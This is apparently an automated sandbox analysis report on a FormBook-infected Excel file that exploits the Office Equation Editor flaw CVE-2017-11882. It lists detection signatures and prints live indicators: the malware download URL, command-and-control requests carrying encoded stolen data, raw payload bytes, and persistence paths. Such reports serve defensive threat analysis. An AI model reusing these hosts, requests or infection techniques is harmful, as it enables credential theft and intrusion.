Analysis Report PO11272020.xlsx

Overview

General Information

Sample Name: PO11272020.xlsx
Analysis ID: 323718
MD5: c2803754fbf19c0073d2dbf2f0fc3871
SHA1: 70b8cad0d3d02eb3dfce050ccaae691e11369416
SHA256: 6774d42ba390417c371d6f46316b3ae3c216c80f8a46b9b3f8906fe9f054f219
Tags: VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Drops PE files to the startup folder
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://amachichywsdyjakelogontothecomputewsrty.ydns.eu/amchdoc/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: PO11272020.xlsx Virustotal: Detection: 35% Perma Link
Source: PO11272020.xlsx ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\ Jump to behavior

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_00417D4B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 4x nop then pop edi 8_2_00417D4B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop edi 9_2_00097D4B
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: amachichywsdyjakelogontothecomputewsrty.ydns.eu
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 162.251.123.239:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 162.251.123.239:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 91.195.241.137:80 -> 192.168.2.22:49167
Uses netstat to query active network connections and open ports
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Nov 2020 11:15:42 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Thu, 26 Nov 2020 18:13:37 GMTETag: "62600-5b50680b5ce8d"Accept-Ranges: bytesContent-Length: 402944Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f5 24 1d e4 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 c2 05 00 00 62 00 00 00 00 00 00 52 e1 05 00 00 20 00 00 00 00 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ff e0 05 00 4f 00 00 00 00 00 06 00 1c 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 06 00 0c 00 00 00 68 e0 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 c1 05 00 00 20 00 00 00 c2 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1c 5e 00 00 00 00 06 00 00 60 00 00 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 24 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 e1 05 00 00 00 00 00 48 00 00 00 02 00 05 00 88 61 00 00 b0 2c 00 00 03 00 00 00 20 00 00 06 38 8e 00 00 30 52 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 11 01 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 16 7d 02 00 00 04 02 16 7d 03 00 00 04 02 16 7d 04 00 00 04 02 16 7d 05 00 00 04 02 22 00 00 00 00 7d 06 00 00 04 02 22 00 00 00 00 7d 07 00 00 04 02 22 00 00 00 00 7d 08 00 00 04 02 22 00 00 00 00 7d 09 00 00 04 02 22 00 00 00 00 7d 0a 00 00 04 02 22 00 00 00 00 7d 0b 00 00 04 02 22 00 00 00 00 7d 0c 00 00 04 02 22 00 00 00 00 7d 0d 00 00 04 02 16 7d 0e 00 00 04 02 16 7d 0f 00 00 04 02 23 00 00 00 00 00 00 00 00 7d 10 00 00 04 02 16 7d 11 00 00 04 02 16 7d 12 00 00 04 02 16 7d 13 00 00 04 02 16 7d 14 00 00 04 02 16 7d 15 00 00 04 02 16 7d 16 00 00 04 02 16 7d 17 00 00 04 02 16 7d 18 00 00 04 02 16 7d 19 00 00 04 02 16 7d 1a 00 00 04 02 16 7d 1b 00 00 04 02 16 7d 1c 00 00 04 02 16 7d 1d 00 00 04 02 14 7d 1f 00 00 04 02 28 10 00 00 0a 00 00 15 28 11 00 00 0a 00 02 28 0e 00 00 06 00 2a 92 00 02 7b 33 00 00 04 28 12 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /zsh/?bF=yL9uBTbbG78KoSpXRM0AXioxGrUEzFPLco0s68NkbehqPfZZENvYiAeYWN1dA1cuKz052A==&hhD4=gXzh_b&sql=1 HTTP/1.1Host: www.gedefo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /zsh/?bF=i/oKhvMZx1zIcgxaF4gHwE4fcf1Ed7aIZ1X+q+iFiuDuW5GIUnLBCT9kDanHyBtFc5puMA==&hhD4=gXzh_b&sql=1 HTTP/1.1Host: www.letstalkop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 184.168.131.241 184.168.131.241
Source: Joe Sandbox View IP Address: 184.168.131.241 184.168.131.241
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View ASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD9B33F8.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /amchdoc/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: amachichywsdyjakelogontothecomputewsrty.ydns.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /zsh/?bF=yL9uBTbbG78KoSpXRM0AXioxGrUEzFPLco0s68NkbehqPfZZENvYiAeYWN1dA1cuKz052A==&hhD4=gXzh_b&sql=1 HTTP/1.1Host: www.gedefo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /zsh/?bF=i/oKhvMZx1zIcgxaF4gHwE4fcf1Ed7aIZ1X+q+iFiuDuW5GIUnLBCT9kDanHyBtFc5puMA==&hhD4=gXzh_b&sql=1 HTTP/1.1Host: www.letstalkop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: amachichywsdyjakelogontothecomputewsrty.ydns.eu
Source: unknown HTTP traffic detected: POST /zsh/ HTTP/1.1Host: www.gedefo.comConnection: closeContent-Length: 261372Cache-Control: no-cacheOrigin: http://www.gedefo.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gedefo.com/zsh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 46 3d 36 70 78 55 66 33 58 52 59 66 30 4d 6f 52 6f 41 4f 38 34 57 4a 48 38 31 41 34 4d 79 34 6b 61 4b 4f 65 70 4f 31 75 67 2d 54 75 41 76 49 39 51 43 4b 34 33 48 35 67 71 58 4b 61 74 74 59 42 38 64 50 44 41 6c 31 39 69 75 66 61 4d 6f 69 74 5a 64 59 77 54 6a 71 6b 6d 38 6e 68 4b 30 32 54 4b 5f 6b 4d 50 47 74 42 77 6a 49 62 52 78 69 54 34 69 6c 7a 47 71 5a 76 56 78 6c 74 74 67 69 66 58 6f 61 41 7e 41 4c 62 62 44 50 75 4d 74 56 34 4b 30 35 49 44 45 38 6c 79 6c 43 36 41 78 39 55 52 4b 62 54 74 5f 68 30 78 6c 49 37 6f 64 72 42 65 61 4b 34 62 72 51 6d 58 43 31 39 57 39 4a 75 6a 70 6b 48 4a 4c 56 4b 65 6e 57 34 62 39 43 63 6c 6e 6e 68 6b 46 47 2d 49 50 6e 52 32 76 74 35 66 6c 7a 44 4f 73 4f 46 55 39 67 63 72 49 30 33 62 64 47 31 78 55 7e 41 64 4e 57 73 28 6f 68 70 79 73 6c 2d 4c 6a 41 67 4c 50 75 42 77 50 5a 76 59 37 7a 5a 4c 65 68 59 54 4d 37 65 41 45 36 64 53 79 4c 68 49 31 52 6f 77 64 78 58 6d 2d 4c 48 34 69 6e 38 61 65 66 65 53 6e 37 36 78 61 37 6a 43 49 38 6c 4b 33 34 73 59 63 4b 35 53 4b 6f 4a 4c 56 34 73 34 67 72 2d 32 69 35 76 56 30 46 66 4a 54 72 57 55 5a 34 57 30 78 79 44 6a 71 77 63 32 45 78 6c 35 78 4f 35 35 48 61 52 77 79 35 6c 50 6c 73 49 65 49 31 41 62 31 6f 49 62 47 75 7a 56 78 34 6e 5a 4a 6c 4b 51 64 67 48 6b 32 4d 2d 37 7a 69 76 58 79 54 68 65 4a 33 37 57 39 49 48 7a 49 77 33 6e 68 66 77 49 67 47 34 71 54 45 2d 36 68 61 41 39 73 63 4d 59 55 41 63 39 79 6e 53 67 57 56 67 46 53 61 35 67 38 41 6c 73 4f 64 33 5a 6a 70 66 42 47 4d 38 4c 66 70 45 6b 55 6a 46 52 48 28 75 31 4a 63 6e 43 76 36 4e 28 64 37 39 73 65 50 4e 33 61 67 50 34 34 61 74 70 64 7e 4b 64 66 6d 2d 44 6e 48 75 72 4c 6a 71 36 31 67 75 4b 61 42 65 49 4b 65 39 62 42 6c 7a 71 71 66 36 6c 75 6c 45 63 7a 72 72 6e 4b 57 34 67 37 78 45 72 36 73 72 49 6b 5a 79 48 68 47 32 77 51 42 63 67 74 63 32 49 55 68 30 38 4b 50 56 42 4a 37 44 49 71 44 56 4f 70 38 5f 66 7a 75 6d 45 56 7e 53 43 6d 28 6b 6c 43 34 4b 4c 53 7e 69 77 78 46 2d 74 4c 72 66 59 54 79 66 32 6c 5a 4e 47 4e 6a 56 6b 47 79 4c 37 58 4b 67 7e 73 6e 45 4f 63 57 4e 42 38 79 79 35 4b 68 44 68 61 44 6e 37 43 4e 4e 6a 45 4a 4e 4a 65 7e 50 41 49 50 58 79 59 62 49 45 71 46 4a 6c 78 7e 54 4a 35 78 56 69 32 4c 39 55 39 62 42 62 7a 33 64 64 6f 4a 53 30 34 4f 73 54 36 72 46 78 5a 54 41 63 58 4f 4d 76 51 54 79 49 61 73 79 45 4a 66 76 77 6c 75 72 42 4d 53 34 69 39 61 4a 39 50 42 38 4e 35 6f 6f 79 69 6c 71 65 79 35 53 78 6e 5a 33 47 61 54 69 54 48 75 43 41 4b 75 48 32 33 4e 76 5a 33 7a 79 71 36 4b 7a 63 41 50 67 31 6c 73 7a 28 42 6a 48 76 59 70 77 5a 6e 58 39 74 59 6c 4f 67 49 79 67 72 51 46 47 33 70 45 63 48 47 4c 42 59 38 4e 46 71 55 4b 55 52 69 6e 2d
Source: explorer.exe, 00000006.00000000.2226075654.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2226075654.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2206551971.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0B
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
